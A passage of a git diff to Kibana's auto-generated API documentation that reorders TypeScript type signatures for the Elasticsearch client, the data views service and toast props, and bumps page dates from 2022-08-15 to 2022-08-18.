{} | ", "SerializableRecord", - " | undefined; schema?: string | undefined; }" + " | undefined; id?: string | undefined; enabled?: boolean | undefined; schema?: string | undefined; }" ], "path": "src/plugins/data/common/search/aggs/agg_configs.ts", "deprecated": false, @@ -29647,7 +29647,7 @@ "label": "SearchTypes", "description": [], "signature": [ - "string | number | boolean | object | number[] | string[] | boolean[] | object[] | undefined" + "string | number | boolean | object | string[] | number[] | boolean[] | object[] | undefined" ], "path": "src/plugins/data/common/search/expressions/eql_raw_response.ts", "deprecated": false, diff --git a/api_docs/data_search.mdx b/api_docs/data_search.mdx index 87964f2418b35..d66fb67babbb6 100644 --- a/api_docs/data_search.mdx +++ b/api_docs/data_search.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/data-search title: "data.search" image: https://source.unsplash.com/400x175/?github description: API docs for the data.search plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'data.search'] --- import dataSearchObj from './data_search.devdocs.json'; diff --git a/api_docs/data_view_editor.mdx b/api_docs/data_view_editor.mdx index 211f3984ffd60..7a59dde802705 100644 --- a/api_docs/data_view_editor.mdx +++ b/api_docs/data_view_editor.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/dataViewEditor title: "dataViewEditor" image: https://source.unsplash.com/400x175/?github description: API docs for the dataViewEditor plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'dataViewEditor'] --- import dataViewEditorObj from './data_view_editor.devdocs.json'; diff --git a/api_docs/data_view_field_editor.mdx b/api_docs/data_view_field_editor.mdx index d18283ff056dc..9c663b8898178 100644 --- a/api_docs/data_view_field_editor.mdx +++ b/api_docs/data_view_field_editor.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/dataViewFieldEditor title: "dataViewFieldEditor" image: https://source.unsplash.com/400x175/?github description: API docs for the dataViewFieldEditor plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'dataViewFieldEditor'] --- import dataViewFieldEditorObj from './data_view_field_editor.devdocs.json'; diff --git a/api_docs/data_view_management.mdx b/api_docs/data_view_management.mdx index ceb11e5b63c5f..ec132aee9cb52 100644 --- a/api_docs/data_view_management.mdx +++ b/api_docs/data_view_management.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/dataViewManagement title: "dataViewManagement" image: https://source.unsplash.com/400x175/?github description: API docs for the dataViewManagement plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'dataViewManagement'] --- import dataViewManagementObj from './data_view_management.devdocs.json'; diff --git a/api_docs/data_views.devdocs.json b/api_docs/data_views.devdocs.json index 76d1d27fa620f..8dd55e506010a 100644 --- a/api_docs/data_views.devdocs.json +++ b/api_docs/data_views.devdocs.json @@ -10858,7 +10858,61 @@ "label": "elasticsearchClient", "description": [], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", @@ -10926,7 +10976,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", @@ -10952,33 +11002,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", @@ -11004,33 +11028,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -11990,6 +11988,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", @@ -16549,7 +16549,7 @@ "signature": [ "Pick<", "Toast", - ", \"children\" | \"color\" | \"className\" | \"lang\" | \"style\" | \"role\" | \"tabIndex\" | \"aria-activedescendant\" | \"aria-atomic\" | \"aria-autocomplete\" | \"aria-busy\" | \"aria-checked\" | \"aria-colcount\" | \"aria-colindex\" | \"aria-colspan\" | \"aria-controls\" | \"aria-current\" | \"aria-describedby\" | \"aria-details\" | \"aria-disabled\" | \"aria-dropeffect\" | \"aria-errormessage\" | \"aria-expanded\" | \"aria-flowto\" | \"aria-grabbed\" | \"aria-haspopup\" | \"aria-hidden\" | \"aria-invalid\" | \"aria-keyshortcuts\" | \"aria-label\" | \"aria-labelledby\" | \"aria-level\" | \"aria-live\" | \"aria-modal\" | \"aria-multiline\" | \"aria-multiselectable\" | \"aria-orientation\" | \"aria-owns\" | \"aria-placeholder\" | \"aria-posinset\" | \"aria-pressed\" | \"aria-readonly\" | \"aria-relevant\" | \"aria-required\" | \"aria-roledescription\" | \"aria-rowcount\" | \"aria-rowindex\" | \"aria-rowspan\" | \"aria-selected\" | \"aria-setsize\" | \"aria-sort\" | \"aria-valuemax\" | \"aria-valuemin\" | \"aria-valuenow\" | \"aria-valuetext\" | \"dangerouslySetInnerHTML\" | \"onCopy\" | \"onCopyCapture\" | \"onCut\" | \"onCutCapture\" | \"onPaste\" | \"onPasteCapture\" | \"onCompositionEnd\" | \"onCompositionEndCapture\" | \"onCompositionStart\" | \"onCompositionStartCapture\" | \"onCompositionUpdate\" | \"onCompositionUpdateCapture\" | \"onFocus\" | \"onFocusCapture\" | \"onBlur\" | \"onBlurCapture\" | \"onChange\" | \"onChangeCapture\" | \"onBeforeInput\" | \"onBeforeInputCapture\" | \"onInput\" | \"onInputCapture\" | \"onReset\" | \"onResetCapture\" | \"onSubmit\" | \"onSubmitCapture\" | \"onInvalid\" | \"onInvalidCapture\" | \"onLoad\" | \"onLoadCapture\" | \"onError\" | \"onErrorCapture\" | \"onKeyDown\" | \"onKeyDownCapture\" | \"onKeyPress\" | \"onKeyPressCapture\" | \"onKeyUp\" | \"onKeyUpCapture\" | \"onAbort\" | \"onAbortCapture\" | \"onCanPlay\" | \"onCanPlayCapture\" | \"onCanPlayThrough\" | \"onCanPlayThroughCapture\" | \"onDurationChange\" | \"onDurationChangeCapture\" | \"onEmptied\" | \"onEmptiedCapture\" | \"onEncrypted\" | \"onEncryptedCapture\" | \"onEnded\" | \"onEndedCapture\" | \"onLoadedData\" | \"onLoadedDataCapture\" | \"onLoadedMetadata\" | \"onLoadedMetadataCapture\" | \"onLoadStart\" | \"onLoadStartCapture\" | \"onPause\" | \"onPauseCapture\" | \"onPlay\" | \"onPlayCapture\" | \"onPlaying\" | \"onPlayingCapture\" | \"onProgress\" | \"onProgressCapture\" | \"onRateChange\" | \"onRateChangeCapture\" | \"onSeeked\" | \"onSeekedCapture\" | \"onSeeking\" | \"onSeekingCapture\" | \"onStalled\" | \"onStalledCapture\" | \"onSuspend\" | \"onSuspendCapture\" | \"onTimeUpdate\" | \"onTimeUpdateCapture\" | \"onVolumeChange\" | \"onVolumeChangeCapture\" | \"onWaiting\" | \"onWaitingCapture\" | \"onAuxClick\" | \"onAuxClickCapture\" | \"onClick\" | \"onClickCapture\" | \"onContextMenu\" | \"onContextMenuCapture\" | \"onDoubleClick\" | \"onDoubleClickCapture\" | \"onDrag\" | \"onDragCapture\" | \"onDragEnd\" | \"onDragEndCapture\" | \"onDragEnter\" | \"onDragEnterCapture\" | \"onDragExit\" | \"onDragExitCapture\" | \"onDragLeave\" | \"onDragLeaveCapture\" | \"onDragOver\" | \"onDragOverCapture\" | \"onDragStart\" | \"onDragStartCapture\" | \"onDrop\" | \"onDropCapture\" | \"onMouseDown\" | \"onMouseDownCapture\" | \"onMouseEnter\" | \"onMouseLeave\" | \"onMouseMove\" | \"onMouseMoveCapture\" | \"onMouseOut\" | \"onMouseOutCapture\" | \"onMouseOver\" | \"onMouseOverCapture\" | \"onMouseUp\" | \"onMouseUpCapture\" | \"onSelect\" | \"onSelectCapture\" | \"onTouchCancel\" | \"onTouchCancelCapture\" | \"onTouchEnd\" | \"onTouchEndCapture\" | \"onTouchMove\" | \"onTouchMoveCapture\" | \"onTouchStart\" | \"onTouchStartCapture\" | \"onPointerDown\" | \"onPointerDownCapture\" | \"onPointerMove\" | \"onPointerMoveCapture\" | \"onPointerUp\" | \"onPointerUpCapture\" | \"onPointerCancel\" | \"onPointerCancelCapture\" | \"onPointerEnter\" | \"onPointerEnterCapture\" | \"onPointerLeave\" | \"onPointerLeaveCapture\" | \"onPointerOver\" | \"onPointerOverCapture\" | \"onPointerOut\" | \"onPointerOutCapture\" | \"onGotPointerCapture\" | \"onGotPointerCaptureCapture\" | \"onLostPointerCapture\" | \"onLostPointerCaptureCapture\" | \"onScroll\" | \"onScrollCapture\" | \"onWheel\" | \"onWheelCapture\" | \"onAnimationStart\" | \"onAnimationStartCapture\" | \"onAnimationEnd\" | \"onAnimationEndCapture\" | \"onAnimationIteration\" | \"onAnimationIterationCapture\" | \"onTransitionEnd\" | \"onTransitionEndCapture\" | \"data-test-subj\" | \"hidden\" | \"security\" | \"defaultValue\" | \"defaultChecked\" | \"suppressContentEditableWarning\" | \"suppressHydrationWarning\" | \"accessKey\" | \"contentEditable\" | \"contextMenu\" | \"dir\" | \"draggable\" | \"placeholder\" | \"slot\" | \"spellCheck\" | \"translate\" | \"radioGroup\" | \"about\" | \"datatype\" | \"inlist\" | \"prefix\" | \"property\" | \"resource\" | \"typeof\" | \"vocab\" | \"autoCapitalize\" | \"autoCorrect\" | \"autoSave\" | \"itemProp\" | \"itemScope\" | \"itemType\" | \"itemID\" | \"itemRef\" | \"results\" | \"unselectable\" | \"inputMode\" | \"is\" | \"toastLifeTimeMs\" | \"iconType\" | \"onClose\"> & { title?: string | ", + ", \"children\" | \"onError\" | \"hidden\" | \"color\" | \"className\" | \"onChange\" | \"onKeyDown\" | \"onClick\" | \"security\" | \"defaultValue\" | \"lang\" | \"defaultChecked\" | \"suppressContentEditableWarning\" | \"suppressHydrationWarning\" | \"accessKey\" | \"contentEditable\" | \"contextMenu\" | \"dir\" | \"draggable\" | \"placeholder\" | \"slot\" | \"spellCheck\" | \"style\" | \"tabIndex\" | \"translate\" | \"radioGroup\" | \"role\" | \"about\" | \"datatype\" | \"inlist\" | \"prefix\" | \"property\" | \"resource\" | \"typeof\" | \"vocab\" | \"autoCapitalize\" | \"autoCorrect\" | \"autoSave\" | \"itemProp\" | \"itemScope\" | \"itemType\" | \"itemID\" | \"itemRef\" | \"results\" | \"unselectable\" | \"inputMode\" | \"is\" | \"aria-activedescendant\" | \"aria-atomic\" | \"aria-autocomplete\" | \"aria-busy\" | \"aria-checked\" | \"aria-colcount\" | \"aria-colindex\" | \"aria-colspan\" | \"aria-controls\" | \"aria-current\" | \"aria-describedby\" | \"aria-details\" | \"aria-disabled\" | \"aria-dropeffect\" | \"aria-errormessage\" | \"aria-expanded\" | \"aria-flowto\" | \"aria-grabbed\" | \"aria-haspopup\" | \"aria-hidden\" | \"aria-invalid\" | \"aria-keyshortcuts\" | \"aria-label\" | \"aria-labelledby\" | \"aria-level\" | \"aria-live\" | \"aria-modal\" | \"aria-multiline\" | \"aria-multiselectable\" | \"aria-orientation\" | \"aria-owns\" | \"aria-placeholder\" | \"aria-posinset\" | \"aria-pressed\" | \"aria-readonly\" | \"aria-relevant\" | \"aria-required\" | \"aria-roledescription\" | \"aria-rowcount\" | \"aria-rowindex\" | \"aria-rowspan\" | \"aria-selected\" | \"aria-setsize\" | \"aria-sort\" | \"aria-valuemax\" | \"aria-valuemin\" | \"aria-valuenow\" | \"aria-valuetext\" | \"dangerouslySetInnerHTML\" | \"onCopy\" | \"onCopyCapture\" | \"onCut\" | \"onCutCapture\" | \"onPaste\" | \"onPasteCapture\" | \"onCompositionEnd\" | \"onCompositionEndCapture\" | \"onCompositionStart\" | \"onCompositionStartCapture\" | \"onCompositionUpdate\" | \"onCompositionUpdateCapture\" | \"onFocus\" | \"onFocusCapture\" | \"onBlur\" | \"onBlurCapture\" | \"onChangeCapture\" | \"onBeforeInput\" | \"onBeforeInputCapture\" | \"onInput\" | \"onInputCapture\" | \"onReset\" | \"onResetCapture\" | \"onSubmit\" | \"onSubmitCapture\" | \"onInvalid\" | \"onInvalidCapture\" | \"onLoad\" | \"onLoadCapture\" | \"onErrorCapture\" | \"onKeyDownCapture\" | \"onKeyPress\" | \"onKeyPressCapture\" | \"onKeyUp\" | \"onKeyUpCapture\" | \"onAbort\" | \"onAbortCapture\" | \"onCanPlay\" | \"onCanPlayCapture\" | \"onCanPlayThrough\" | \"onCanPlayThroughCapture\" | \"onDurationChange\" | \"onDurationChangeCapture\" | \"onEmptied\" | \"onEmptiedCapture\" | \"onEncrypted\" | \"onEncryptedCapture\" | \"onEnded\" | \"onEndedCapture\" | \"onLoadedData\" | \"onLoadedDataCapture\" | \"onLoadedMetadata\" | \"onLoadedMetadataCapture\" | \"onLoadStart\" | \"onLoadStartCapture\" | \"onPause\" | \"onPauseCapture\" | \"onPlay\" | \"onPlayCapture\" | \"onPlaying\" | \"onPlayingCapture\" | \"onProgress\" | \"onProgressCapture\" | \"onRateChange\" | \"onRateChangeCapture\" | \"onSeeked\" | \"onSeekedCapture\" | \"onSeeking\" | \"onSeekingCapture\" | \"onStalled\" | \"onStalledCapture\" | \"onSuspend\" | \"onSuspendCapture\" | \"onTimeUpdate\" | \"onTimeUpdateCapture\" | \"onVolumeChange\" | \"onVolumeChangeCapture\" | \"onWaiting\" | \"onWaitingCapture\" | \"onAuxClick\" | \"onAuxClickCapture\" | \"onClickCapture\" | \"onContextMenu\" | \"onContextMenuCapture\" | \"onDoubleClick\" | \"onDoubleClickCapture\" | \"onDrag\" | \"onDragCapture\" | \"onDragEnd\" | \"onDragEndCapture\" | \"onDragEnter\" | \"onDragEnterCapture\" | \"onDragExit\" | \"onDragExitCapture\" | \"onDragLeave\" | \"onDragLeaveCapture\" | \"onDragOver\" | \"onDragOverCapture\" | \"onDragStart\" | \"onDragStartCapture\" | \"onDrop\" | \"onDropCapture\" | \"onMouseDown\" | \"onMouseDownCapture\" | \"onMouseEnter\" | \"onMouseLeave\" | \"onMouseMove\" | \"onMouseMoveCapture\" | \"onMouseOut\" | \"onMouseOutCapture\" | \"onMouseOver\" | \"onMouseOverCapture\" | \"onMouseUp\" | \"onMouseUpCapture\" | \"onSelect\" | \"onSelectCapture\" | \"onTouchCancel\" | \"onTouchCancelCapture\" | \"onTouchEnd\" | \"onTouchEndCapture\" | \"onTouchMove\" | \"onTouchMoveCapture\" | \"onTouchStart\" | \"onTouchStartCapture\" | \"onPointerDown\" | \"onPointerDownCapture\" | \"onPointerMove\" | \"onPointerMoveCapture\" | \"onPointerUp\" | \"onPointerUpCapture\" | \"onPointerCancel\" | \"onPointerCancelCapture\" | \"onPointerEnter\" | \"onPointerEnterCapture\" | \"onPointerLeave\" | \"onPointerLeaveCapture\" | \"onPointerOver\" | \"onPointerOverCapture\" | \"onPointerOut\" | \"onPointerOutCapture\" | \"onGotPointerCapture\" | \"onGotPointerCaptureCapture\" | \"onLostPointerCapture\" | \"onLostPointerCaptureCapture\" | \"onScroll\" | \"onScrollCapture\" | \"onWheel\" | \"onWheelCapture\" | \"onAnimationStart\" | \"onAnimationStartCapture\" | \"onAnimationEnd\" | \"onAnimationEndCapture\" | \"onAnimationIteration\" | \"onAnimationIterationCapture\" | \"onTransitionEnd\" | \"onTransitionEndCapture\" | \"toastLifeTimeMs\" | \"iconType\" | \"onClose\" | \"data-test-subj\"> & { title?: string | ", "MountPoint", " | undefined; text?: string | ", "MountPoint", @@ -19748,7 +19748,7 @@ "label": "DataViewSavedObjectAttrs", "description": [], "signature": [ - "{ type?: string | undefined; name?: string | undefined; title: string; typeMeta?: string | undefined; }" + "{ type?: string | undefined; title: string; name?: string | undefined; typeMeta?: string | undefined; }" ], "path": "src/plugins/data_views/common/data_views/data_views.ts", "deprecated": false, @@ -19764,23 +19764,23 @@ "\nData views service interface" ], "signature": [ - "{ create: ({ id, name, title, ...restOfSpec }: ", + "{ get: (id: string) => Promise<", { "pluginId": "dataViews", "scope": "common", "docId": "kibDataViewsPluginApi", - "section": "def-common.DataViewSpec", - "text": "DataViewSpec" + "section": "def-common.DataView", + "text": "DataView" }, - ", skipFetchFields?: boolean) => Promise<", + ">; delete: (indexPatternId: string) => Promise<{}>; create: ({ id, name, title, ...restOfSpec }: ", { "pluginId": "dataViews", "scope": "common", "docId": "kibDataViewsPluginApi", - "section": "def-common.DataView", - "text": "DataView" + "section": "def-common.DataViewSpec", + "text": "DataViewSpec" }, - ">; find: (search: string, size?: number) => Promise<", + ", skipFetchFields?: boolean) => Promise<", { "pluginId": "dataViews", "scope": "common", @@ -19788,7 +19788,7 @@ "section": "def-common.DataView", "text": "DataView" }, - "[]>; get: (id: string) => Promise<", + ">; find: (search: string, size?: number) => Promise<", { "pluginId": "dataViews", "scope": "common", @@ -19796,7 +19796,7 @@ "section": "def-common.DataView", "text": "DataView" }, - ">; delete: (indexPatternId: string) => Promise<{}>; getCanSave: () => Promise; getIds: (refresh?: boolean) => Promise; getTitles: (refresh?: boolean) => Promise; getIdsWithTitle: (refresh?: boolean) => Promise<", + "[]>; getCanSave: () => Promise; getIds: (refresh?: boolean) => Promise; getTitles: (refresh?: boolean) => Promise; getIdsWithTitle: (refresh?: boolean) => Promise<", { "pluginId": "dataViews", "scope": "common", @@ -20309,7 +20309,7 @@ "signature": [ "Pick<", "Toast", - ", \"children\" | \"color\" | \"className\" | \"lang\" | \"style\" | \"role\" | \"tabIndex\" | \"aria-activedescendant\" | \"aria-atomic\" | \"aria-autocomplete\" | \"aria-busy\" | \"aria-checked\" | \"aria-colcount\" | \"aria-colindex\" | \"aria-colspan\" | \"aria-controls\" | \"aria-current\" | \"aria-describedby\" | \"aria-details\" | \"aria-disabled\" | \"aria-dropeffect\" | \"aria-errormessage\" | \"aria-expanded\" | \"aria-flowto\" | \"aria-grabbed\" | \"aria-haspopup\" | \"aria-hidden\" | \"aria-invalid\" | \"aria-keyshortcuts\" | \"aria-label\" | \"aria-labelledby\" | \"aria-level\" | \"aria-live\" | \"aria-modal\" | \"aria-multiline\" | \"aria-multiselectable\" | \"aria-orientation\" | \"aria-owns\" | \"aria-placeholder\" | \"aria-posinset\" | \"aria-pressed\" | \"aria-readonly\" | \"aria-relevant\" | \"aria-required\" | \"aria-roledescription\" | \"aria-rowcount\" | \"aria-rowindex\" | \"aria-rowspan\" | \"aria-selected\" | \"aria-setsize\" | \"aria-sort\" | \"aria-valuemax\" | \"aria-valuemin\" | \"aria-valuenow\" | \"aria-valuetext\" | \"dangerouslySetInnerHTML\" | \"onCopy\" | \"onCopyCapture\" | \"onCut\" | \"onCutCapture\" | \"onPaste\" | \"onPasteCapture\" | \"onCompositionEnd\" | \"onCompositionEndCapture\" | \"onCompositionStart\" | \"onCompositionStartCapture\" | \"onCompositionUpdate\" | \"onCompositionUpdateCapture\" | \"onFocus\" | \"onFocusCapture\" | \"onBlur\" | \"onBlurCapture\" | \"onChange\" | \"onChangeCapture\" | \"onBeforeInput\" | \"onBeforeInputCapture\" | \"onInput\" | \"onInputCapture\" | \"onReset\" | \"onResetCapture\" | \"onSubmit\" | \"onSubmitCapture\" | \"onInvalid\" | \"onInvalidCapture\" | \"onLoad\" | \"onLoadCapture\" | \"onError\" | \"onErrorCapture\" | \"onKeyDown\" | \"onKeyDownCapture\" | \"onKeyPress\" | \"onKeyPressCapture\" | \"onKeyUp\" | \"onKeyUpCapture\" | \"onAbort\" | \"onAbortCapture\" | \"onCanPlay\" | \"onCanPlayCapture\" | \"onCanPlayThrough\" | \"onCanPlayThroughCapture\" | \"onDurationChange\" | \"onDurationChangeCapture\" | \"onEmptied\" | \"onEmptiedCapture\" | \"onEncrypted\" | \"onEncryptedCapture\" | \"onEnded\" | \"onEndedCapture\" | \"onLoadedData\" | \"onLoadedDataCapture\" | \"onLoadedMetadata\" | \"onLoadedMetadataCapture\" | \"onLoadStart\" | \"onLoadStartCapture\" | \"onPause\" | \"onPauseCapture\" | \"onPlay\" | \"onPlayCapture\" | \"onPlaying\" | \"onPlayingCapture\" | \"onProgress\" | \"onProgressCapture\" | \"onRateChange\" | \"onRateChangeCapture\" | \"onSeeked\" | \"onSeekedCapture\" | \"onSeeking\" | \"onSeekingCapture\" | \"onStalled\" | \"onStalledCapture\" | \"onSuspend\" | \"onSuspendCapture\" | \"onTimeUpdate\" | \"onTimeUpdateCapture\" | \"onVolumeChange\" | \"onVolumeChangeCapture\" | \"onWaiting\" | \"onWaitingCapture\" | \"onAuxClick\" | \"onAuxClickCapture\" | \"onClick\" | \"onClickCapture\" | \"onContextMenu\" | \"onContextMenuCapture\" | \"onDoubleClick\" | \"onDoubleClickCapture\" | \"onDrag\" | \"onDragCapture\" | \"onDragEnd\" | \"onDragEndCapture\" | \"onDragEnter\" | \"onDragEnterCapture\" | \"onDragExit\" | \"onDragExitCapture\" | \"onDragLeave\" | \"onDragLeaveCapture\" | \"onDragOver\" | \"onDragOverCapture\" | \"onDragStart\" | \"onDragStartCapture\" | \"onDrop\" | \"onDropCapture\" | \"onMouseDown\" | \"onMouseDownCapture\" | \"onMouseEnter\" | \"onMouseLeave\" | \"onMouseMove\" | \"onMouseMoveCapture\" | \"onMouseOut\" | \"onMouseOutCapture\" | \"onMouseOver\" | \"onMouseOverCapture\" | \"onMouseUp\" | \"onMouseUpCapture\" | \"onSelect\" | \"onSelectCapture\" | \"onTouchCancel\" | \"onTouchCancelCapture\" | \"onTouchEnd\" | \"onTouchEndCapture\" | \"onTouchMove\" | \"onTouchMoveCapture\" | \"onTouchStart\" | \"onTouchStartCapture\" | \"onPointerDown\" | \"onPointerDownCapture\" | \"onPointerMove\" | \"onPointerMoveCapture\" | \"onPointerUp\" | \"onPointerUpCapture\" | \"onPointerCancel\" | \"onPointerCancelCapture\" | \"onPointerEnter\" | \"onPointerEnterCapture\" | \"onPointerLeave\" | \"onPointerLeaveCapture\" | \"onPointerOver\" | \"onPointerOverCapture\" | \"onPointerOut\" | \"onPointerOutCapture\" | \"onGotPointerCapture\" | \"onGotPointerCaptureCapture\" | \"onLostPointerCapture\" | \"onLostPointerCaptureCapture\" | \"onScroll\" | \"onScrollCapture\" | \"onWheel\" | \"onWheelCapture\" | \"onAnimationStart\" | \"onAnimationStartCapture\" | \"onAnimationEnd\" | \"onAnimationEndCapture\" | \"onAnimationIteration\" | \"onAnimationIterationCapture\" | \"onTransitionEnd\" | \"onTransitionEndCapture\" | \"data-test-subj\" | \"hidden\" | \"security\" | \"defaultValue\" | \"defaultChecked\" | \"suppressContentEditableWarning\" | \"suppressHydrationWarning\" | \"accessKey\" | \"contentEditable\" | \"contextMenu\" | \"dir\" | \"draggable\" | \"placeholder\" | \"slot\" | \"spellCheck\" | \"translate\" | \"radioGroup\" | \"about\" | \"datatype\" | \"inlist\" | \"prefix\" | \"property\" | \"resource\" | \"typeof\" | \"vocab\" | \"autoCapitalize\" | \"autoCorrect\" | \"autoSave\" | \"itemProp\" | \"itemScope\" | \"itemType\" | \"itemID\" | \"itemRef\" | \"results\" | \"unselectable\" | \"inputMode\" | \"is\" | \"toastLifeTimeMs\" | \"iconType\" | \"onClose\"> & { title?: string | ", + ", \"children\" | \"onError\" | \"hidden\" | \"color\" | \"className\" | \"onChange\" | \"onKeyDown\" | \"onClick\" | \"security\" | \"defaultValue\" | \"lang\" | \"defaultChecked\" | \"suppressContentEditableWarning\" | \"suppressHydrationWarning\" | \"accessKey\" | \"contentEditable\" | \"contextMenu\" | \"dir\" | \"draggable\" | \"placeholder\" | \"slot\" | \"spellCheck\" | \"style\" | \"tabIndex\" | \"translate\" | \"radioGroup\" | \"role\" | \"about\" | \"datatype\" | \"inlist\" | \"prefix\" | \"property\" | \"resource\" | \"typeof\" | \"vocab\" | \"autoCapitalize\" | \"autoCorrect\" | \"autoSave\" | \"itemProp\" | \"itemScope\" | \"itemType\" | \"itemID\" | \"itemRef\" | \"results\" | \"unselectable\" | \"inputMode\" | \"is\" | \"aria-activedescendant\" | \"aria-atomic\" | \"aria-autocomplete\" | \"aria-busy\" | \"aria-checked\" | \"aria-colcount\" | \"aria-colindex\" | \"aria-colspan\" | \"aria-controls\" | \"aria-current\" | \"aria-describedby\" | \"aria-details\" | \"aria-disabled\" | \"aria-dropeffect\" | \"aria-errormessage\" | \"aria-expanded\" | \"aria-flowto\" | \"aria-grabbed\" | \"aria-haspopup\" | \"aria-hidden\" | \"aria-invalid\" | \"aria-keyshortcuts\" | \"aria-label\" | \"aria-labelledby\" | \"aria-level\" | \"aria-live\" | \"aria-modal\" | \"aria-multiline\" | \"aria-multiselectable\" | \"aria-orientation\" | \"aria-owns\" | \"aria-placeholder\" | \"aria-posinset\" | \"aria-pressed\" | \"aria-readonly\" | \"aria-relevant\" | \"aria-required\" | \"aria-roledescription\" | \"aria-rowcount\" | \"aria-rowindex\" | \"aria-rowspan\" | \"aria-selected\" | \"aria-setsize\" | \"aria-sort\" | \"aria-valuemax\" | \"aria-valuemin\" | \"aria-valuenow\" | \"aria-valuetext\" | \"dangerouslySetInnerHTML\" | \"onCopy\" | \"onCopyCapture\" | \"onCut\" | \"onCutCapture\" | \"onPaste\" | \"onPasteCapture\" | \"onCompositionEnd\" | \"onCompositionEndCapture\" | \"onCompositionStart\" | \"onCompositionStartCapture\" | \"onCompositionUpdate\" | \"onCompositionUpdateCapture\" | \"onFocus\" | \"onFocusCapture\" | \"onBlur\" | \"onBlurCapture\" | \"onChangeCapture\" | \"onBeforeInput\" | \"onBeforeInputCapture\" | \"onInput\" | \"onInputCapture\" | \"onReset\" | \"onResetCapture\" | \"onSubmit\" | 